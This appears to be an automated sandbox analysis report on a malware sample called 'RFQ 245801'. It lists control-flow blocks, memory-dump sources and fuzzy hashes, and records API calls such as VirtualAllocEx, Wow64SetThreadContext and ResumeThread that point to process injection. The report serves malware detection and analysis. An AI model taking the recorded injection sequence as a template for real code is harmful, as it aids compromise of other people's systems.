• Instruction Fuzzy Hash: 1D2139B59002498FDB20DFAAC485BEEBBF4AF48324F14842AD459A7241C7789984CFA5

Control-flow Graph
• Basic blocks: 389: 7335091-7335125 (ReadProcessMemory); 393: 7335127-733512d; 394: 733512e-733515e
• Edges: 389->393, 389->394, 393->394
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07335118
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 1d3920b82001f5c9b6b141c5499cc6f44a27d4c0b551e56404368e47fdc93f4d
• Instruction ID: 07b57fee15155a9a31bfa64c8b9432b7dedaf8fcd4aa4ee5d7ee737eb1ac5bb1
• Opcode Fuzzy Hash: 1d3920b82001f5c9b6b141c5499cc6f44a27d4c0b551e56404368e47fdc93f4d
• Instruction Fuzzy Hash: 8E2139B1C002599FCB10DFAAC885AEEFFF5FF48320F10842AE958A7251C7349554CBA4

Control-flow Graph
• Basic blocks: 398: 7334e10-7334e5b; 400: 7334e6b-7334e9b (Wow64SetThreadContext); 401: 7334e5d-7334e69; 403: 7334ea4-7334ed4; 404: 7334e9d-7334ea3
• Edges: 398->400, 398->401, 400->403, 400->404, 401->400, 404->403
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07334E8E
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 264aa345ce607c2da0fedd8975bb60e8c7b82dc022815b6870fb230f39035021
• Instruction ID: 572843eb366706a58687898d23d41cd822401e22e5c1131ab07171fdc00d3d4e
• Opcode Fuzzy Hash: 264aa345ce607c2da0fedd8975bb60e8c7b82dc022815b6870fb230f39035021
• Instruction Fuzzy Hash: 3A2129B1D003598FDB20DFAAC4857EEBBF4EF88324F148429D459A7241C7789945CFA5

Control-flow Graph
• Basic blocks: 408: 7335098-7335125 (ReadProcessMemory); 411: 7335127-733512d; 412: 733512e-733515e
• Edges: 408->411, 408->412, 411->412
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07335118
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: f76cbc9fed6e06473edb85a34609634dc5237b937f507a02a55e5832b66e9298
• Instruction ID: 104ef047744abe55b88f88ec53a43275b2312459a7fc92d0886654cf75f7860e
• Opcode Fuzzy Hash: f76cbc9fed6e06473edb85a34609634dc5237b937f507a02a55e5832b66e9298
• Instruction Fuzzy Hash: 402139B1C003599FDB10DFAAC841AEEFBF5FF48310F108429E958A7250C7389554CBA4

Control-flow Graph
• Basic blocks: 416: 7334ee0-7334f63 (VirtualAllocEx); 420: 7334f65-7334f6b; 421: 7334f6c-7334f91
• Edges: 416->420, 416->421, 420->421
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07334F56
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: bddc1ffb9748747f0855198472050827fe059fbfd0ec33d02912a438db329c2f
• Instruction ID: 914b3e94ed30391aba4c0ddb6ac4819560ec83c678a253191bbf22b819ec4b87
• Opcode Fuzzy Hash: bddc1ffb9748747f0855198472050827fe059fbfd0ec33d02912a438db329c2f
• Instruction Fuzzy Hash: 68114AB68002499FCB20DFA9C845BDEBFF5EB48320F248419E559A7250C7359554CBA1

Control-flow Graph
• Basic blocks: 434: 7334ee8-7334f63 (VirtualAllocEx); 437: 7334f65-7334f6b; 438: 7334f6c-7334f91
• Edges: 434->437, 434->438, 437->438
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07334F56
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 63527c1bfc1e9bcab7784bc83f1d43f5176c1b17b6e7dffd002bd46ac873f2e7
• Instruction ID: d0a0c7c8b2b69916496a52c59450262907172b90a3fde5eead91b9ed555e7180
• Opcode Fuzzy Hash: 63527c1bfc1e9bcab7784bc83f1d43f5176c1b17b6e7dffd002bd46ac873f2e7
• Instruction Fuzzy Hash: 891167B18002499FCB20DFAAC844BEEBFF5EF88320F148419E559A7250C735A540CFA0

Control-flow Graph
• Basic blocks: 425: 7334921-7334997 (ResumeThread); 429: 73349a0-73349c5; 430: 7334999-733499f
• Edges: 425->429, 425->430, 430->429
APIs
• ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,00000048), ref: 0733498A
Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 5cbe94e1b7e4f11bfece5e453a44afe1a81ef8191ec582d842333c0aff701f73
• Instruction ID: cade7dcb67a1ca250b25d80a6c4cf61938d63dc5d9de3255e2065185d7867aa4
• Opcode Fuzzy Hash: 5cbe94e1b7e4f11bfece5e453a44afe1a81ef8191ec582d842333c0aff701f73
• Instruction Fuzzy Hash: 73118BB19003488FCB20DFAAC445BEEFFF4AF88324F14841AC459A7240C735A444CBA4

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 442 7334928-7334997 ResumeThread 445 73349a0-73349c5 442->445 446 7334999-733499f 442->446 446->445
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,00000048), ref: 0733498A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                  • Opcode ID: 35f2ecb5644588d2e104ee004aa9eb705c5d35c30a653617f69a4ce1659b8415
                                                                                                                                                                                  • Instruction ID: a2b1f40a82b72449f6c77a5911c3c2d8edf62faa26094e88828d003abe5f85bb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 35f2ecb5644588d2e104ee004aa9eb705c5d35c30a653617f69a4ce1659b8415
                                                                                                                                                                                  • Instruction Fuzzy Hash: B61136B1D002498FDB20DFAAC445BEEFBF4EB88324F248429D459A7250CB75A944CFA5
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 029EB6FE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745402178.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_29e0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                  • Opcode ID: e6e5e63442d2e7c0a74744f64555cc18c8eb64707badac8dd8b3ca6b4ff200a2
                                                                                                                                                                                  • Instruction ID: 79577e34cfe3d8a5b87f97e06bfd64c127108f09573baf47598ddce8542bf1b2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e6e5e63442d2e7c0a74744f64555cc18c8eb64707badac8dd8b3ca6b4ff200a2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 201110B5C00349CFCB10CF9AC444ADEFBF8BB88328F10842AD819A7610C375A545CFA1
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 0733A345
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                                  • Opcode ID: 37bdfe368ead80ed6dea472da5b74b96d3f88ed60734ffe6d2febaaabbad5d3e
                                                                                                                                                                                  • Instruction ID: e79c9cd02c918022c68431b2429886057c3196c5691f0ca257590b5f9efe6a2f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 37bdfe368ead80ed6dea472da5b74b96d3f88ed60734ffe6d2febaaabbad5d3e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F11E0B58002499FDB20CF9AD485BDEBBF8EB48324F14845AE558A7610C375A984CFA5
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 0733A345
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                                                  • Opcode ID: fb7919771b6a3ee5a843c73c1fb5715e4b16c35a9b94302c8b430ba947008d60
                                                                                                                                                                                  • Instruction ID: 2bdbbcee97efcf21b5f41df93532249dfc6e1e39c9561d64901ed8bd01f651e8
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb7919771b6a3ee5a843c73c1fb5715e4b16c35a9b94302c8b430ba947008d60
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D11D3B58003499FDB20DF9AC445BDEFBF8EB48324F148419E558A7610C375A584CFA5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743516172.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c9d000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2f937121273d50147e9c5de664df375d522a29aaf1ec0721cd62357307d7ab6a
                                                                                                                                                                                  • Instruction ID: 9c89fdf18a9f5d4f17d7c8dc45f6af9444cbad5b0d4c833a19c398b043fd5540
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f937121273d50147e9c5de664df375d522a29aaf1ec0721cd62357307d7ab6a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D1212872504240DFCF05DF14D9C8B2BBFA5FB98324F24C269E90A2B255C33AD856CBA1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b21f03d55893ed6736f5876da2ee00409db295af44d07cf19a7dd05e11931083
                                                                                                                                                                                  • Instruction ID: d4eb7d0ba2c7594baabd46641a829b9f2066d17c9a352f8e6045148e9c32f842
                                                                                                                                                                                  • Opcode Fuzzy Hash: b21f03d55893ed6736f5876da2ee00409db295af44d07cf19a7dd05e11931083
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A212671504205DFDB04DF14D5C4B2ABBA5FB89318F20C66DE90B4B756C33AE846CB62
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a8393099674c49fb96a41f8784a5ccef1aa30554b99bead597d4100bc0bd9717
                                                                                                                                                                                  • Instruction ID: 56733ca087c5bc225860a6b21fbba5bffba9d26a8b55264f6c3aa5e1912d0bd7
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8393099674c49fb96a41f8784a5ccef1aa30554b99bead597d4100bc0bd9717
                                                                                                                                                                                  • Instruction Fuzzy Hash: C8210471604205DFCB14DF24D9C4B26BFA5FB89318F20C56DE84B4B696C33AD847CA61
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 11a86756e3ee7402a1fa13d4084f9b605714aa79aca6a4456d21e5418c324874
                                                                                                                                                                                  • Instruction ID: 4b291ba858381d667e805d901afabc9080601440d8a929bd5fe760f6da51490f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 11a86756e3ee7402a1fa13d4084f9b605714aa79aca6a4456d21e5418c324874
                                                                                                                                                                                  • Instruction Fuzzy Hash: 462104B1604205DFCF04DF24D9C0B26BBB5FB85718F20C5ADE84B4B666C33AD846CA62
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b2df24d6a3c71b0c7a2816efabcf6ff5d07f18e2156047a8e5bd0f159139eba3
                                                                                                                                                                                  • Instruction ID: 2ccfcf7784d3deccbb47de03c7fbbb030f8cec2ab394e471c542e5530f887bd8
                                                                                                                                                                                  • Opcode Fuzzy Hash: b2df24d6a3c71b0c7a2816efabcf6ff5d07f18e2156047a8e5bd0f159139eba3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 382153755093808FDB12CF24D594715BF71EB46318F28C5DAD84A8F6A7C33A990ACB62
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1743516172.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c9d000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
• Instruction ID: 659d2d406c6c6d799ab267ad86824b43770dd8ef231b5a5c7d6544849dff00ca
• Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
• Instruction Fuzzy Hash: F4219D76504284DFDF06CF10D9C4B1ABF72FB98324F24C6A9D94A1B256C33AD926CB91

Memory Dump Source
• Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction ID: f73a383bc0a94d00f2892912f794ebbd331aba895ec90493f04b47c793c77d93
• Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction Fuzzy Hash: E311DD75504284CFCB01CF14D5C4B15BFB1FB85318F24C6AAD84A4B666C33AD80ACB62

Memory Dump Source
• Source File: 00000000.00000002.1743703221.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_cad000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction ID: 6c8bb4da928ae3ef260ef6e3169ccd74d1c16b96b97c13441bdcefe5d3264c1b
• Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction Fuzzy Hash: D811DD75504280CFDB01CF10D5C4B15BFB1FB89318F24C6AAD84A4B666C33AE84ACB61

Memory Dump Source
• Source File: 00000000.00000002.1743516172.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c9d000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9a2e741e98582be5aebfecd89c957bdacd8b604e76ac3546b56f8831fe8237cc
• Instruction ID: 3e190c1d55e6ee99160582daa3bc01d8a11561830c50048013389a3a1af484d2
• Opcode Fuzzy Hash: 9a2e741e98582be5aebfecd89c957bdacd8b604e76ac3546b56f8831fe8237cc
• Instruction Fuzzy Hash: BE012B310083449AEF10AB16CD88767FFD8EF51324F18C56AEC5A6E286CA39DC40C6B2

Memory Dump Source
• Source File: 00000000.00000002.1743516172.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c9d000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e0d41381de62282c4224f15820faccfcb1603a92d817935512f0c225ca08415
• Instruction ID: 1a855b08d0c67891a564888efb030c734ed6252d337eb24ce959ea0ae0576fd4
• Opcode Fuzzy Hash: 4e0d41381de62282c4224f15820faccfcb1603a92d817935512f0c225ca08415
• Instruction Fuzzy Hash: 68F0C2710083449BEB109B16C888B62FFA8EB91324F18C45AED495E286C2799840CAB1

Memory Dump Source
• Source File: 00000000.00000002.1745402178.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29e0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 17f5a0857478b57515c2ecde844a657e7c6ffe4000ac3e21a8995588ee339e11
• Instruction ID: 46f15a582364701f85ec9d2ed9fcb16dbcd18d73c8d6a945f57db5404942d4b7
• Opcode Fuzzy Hash: 17f5a0857478b57515c2ecde844a657e7c6ffe4000ac3e21a8995588ee339e11
• Instruction Fuzzy Hash: 8512E6F1D80765CAD350CF25E84829A7BA0BB4032EF504F09D2751B2D9DBB8916BCF64

Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 73f6587b4a82efaf446f22156550b2d759f1956015d2fa88ee2f7c21f6559175
• Instruction ID: 3f55d69ff716201688f976324026b2cf812823b80a2e63002cab62cc0e78bfc2
• Opcode Fuzzy Hash: 73f6587b4a82efaf446f22156550b2d759f1956015d2fa88ee2f7c21f6559175
• Instruction Fuzzy Hash: 71E10DB4E141198FDB14DFA9C5809AEFBF2FF89304F249159D418AB35ADB31A941CFA0

Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c2d6c07610dc208dc7b603e7e5e70999505f1df3d2a990aaec5abe640982fa5c
• Instruction ID: 9c0ebecff7ffb234bbb13252748362f3ebc4befea3926a05bf89d693b37db66e
• Opcode Fuzzy Hash: c2d6c07610dc208dc7b603e7e5e70999505f1df3d2a990aaec5abe640982fa5c
• Instruction Fuzzy Hash: 3BE10DB4E041198FDB14DFA9C5809AEFBF2FF89304F249159E418AB359DB31A941CFA0

Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e3273e2aa49e5453581f7fcd4843a76084aa1b4c132c158db418c61a8c6299e
• Instruction ID: a3a9044712e156dd6220995472e156a59bf14c202bc26fa03120c3f676a80ded
• Opcode Fuzzy Hash: 4e3273e2aa49e5453581f7fcd4843a76084aa1b4c132c158db418c61a8c6299e
• Instruction Fuzzy Hash: AAE10BB4E041598FDB14DF99C5809AEFBF2BF89304F248169D418AB35ADB31A941CFA1

Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aace6474d39920c5fea4f9b2c9d1a7733ec365f4d586d04fbc8a1155769f72e8
• Instruction ID: 303f86493e7fae417ea2e34b5b2ab1878a6a39a338e5a37fff49b8d619bd9d86
• Opcode Fuzzy Hash: aace6474d39920c5fea4f9b2c9d1a7733ec365f4d586d04fbc8a1155769f72e8
• Instruction Fuzzy Hash: 13E1ECB4E041198FDB14DFA9C5809AEFBF2FF49304F249169E418AB359DB31A941CFA1

Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29a492d1e0348ee19d968ed442cf20b56ad549e4e59a063c17ffe2f9eedf6717
• Instruction ID: 831708b98cb9f38086a6d3365939d1fe29de890f7d284c90cdefc5c91d18b512
• Opcode Fuzzy Hash: 29a492d1e0348ee19d968ed442cf20b56ad549e4e59a063c17ffe2f9eedf6717
• Instruction Fuzzy Hash: AEE1FCB4E041598FDB14DFA9C5809AEFBF2FF89304F249159D418A735ADB31A941CFA0

Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a8f13644310ec4f610069a28bb015e9727eb73c3c4547d7b9f24521c6f4d317c
• Instruction ID: 9f00b42ccd98aedfd6ba439f202e6b5353fec66bf4f4ca6e3680b380fdc771d0
• Opcode Fuzzy Hash: a8f13644310ec4f610069a28bb015e9727eb73c3c4547d7b9f24521c6f4d317c
• Instruction Fuzzy Hash: CF912DB4E002198FDB14DFA9C984AAEFBF2FF89304F148169D419AB315DB31A941CF90

Memory Dump Source
• Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8fdf9ae09f35a22355a719eba99adce806002ffbf53d223ce788b1b6b3199d61
• Instruction ID: dd1cc3bcf20b0002a5a24ee3e514d944b4c17c4300ee1e752a79329bfb7be1af
• Opcode Fuzzy Hash: 8fdf9ae09f35a22355a719eba99adce806002ffbf53d223ce788b1b6b3199d61
• Instruction Fuzzy Hash: 65510BB0E042598FDB14DFA9C5805AEFBF2FF89304F24816AD418A7356DB319941CFA5

Execution Graph

Execution Coverage:1.4%
Dynamic/Decrypted Code Coverage:2.7%
Signature Coverage:6.2%
Total number of Nodes:549
Total number of Limit Nodes:66
                                                                                                                                                                                  execution_graph 97270 41f0e0 97271 41f0eb 97270->97271 97273 41b940 97270->97273 97274 41b966 97273->97274 97281 409d40 97274->97281 97276 41b972 97277 41b993 97276->97277 97289 40c1c0 97276->97289 97277->97271 97279 41b985 97325 41a680 97279->97325 97328 409c90 97281->97328 97283 409d4d 97284 409d54 97283->97284 97340 409c30 97283->97340 97284->97276 97290 40c1e5 97289->97290 97748 40b1c0 97290->97748 97292 40c23c 97752 40ae40 97292->97752 97294 40c4b3 97294->97279 97295 40c262 97295->97294 97761 4143a0 97295->97761 97297 40c2a7 97297->97294 97764 408a60 97297->97764 97299 40c2eb 97299->97294 97771 41a4d0 97299->97771 97303 40c341 97304 40c348 97303->97304 97783 419fe0 97303->97783 97306 41bd90 2 API calls 97304->97306 97308 40c355 97306->97308 97308->97279 97309 40c392 97310 41bd90 2 API calls 97309->97310 97311 40c399 97310->97311 97311->97279 97312 40c3a2 97313 40f4a0 3 API calls 97312->97313 97314 40c416 97313->97314 97314->97304 97315 40c421 97314->97315 97316 41bd90 2 API calls 97315->97316 97317 40c445 97316->97317 97788 41a030 97317->97788 97320 419fe0 2 API calls 97321 40c480 97320->97321 97321->97294 97793 419df0 97321->97793 97324 41a680 2 API calls 97324->97294 97326 41af30 LdrLoadDll 97325->97326 97327 41a69f ExitProcess 97326->97327 97327->97277 97329 409ca3 97328->97329 97379 418b90 LdrLoadDll 97328->97379 97359 418a40 97329->97359 97332 409cb6 97332->97283 97333 409cac 97333->97332 97362 41b280 97333->97362 97335 409cf3 97335->97332 97373 409ab0 97335->97373 97337 409d13 97380 409620 LdrLoadDll 97337->97380 97339 409d25 97339->97283 97341 409c4a 97340->97341 97342 41b570 LdrLoadDll 97340->97342 97723 41b570 97341->97723 97342->97341 97345 41b570 LdrLoadDll 97346 409c71 97345->97346 97347 40f180 97346->97347 97348 40f199 97347->97348 97731 40b040 97348->97731 97350 40f1ac 
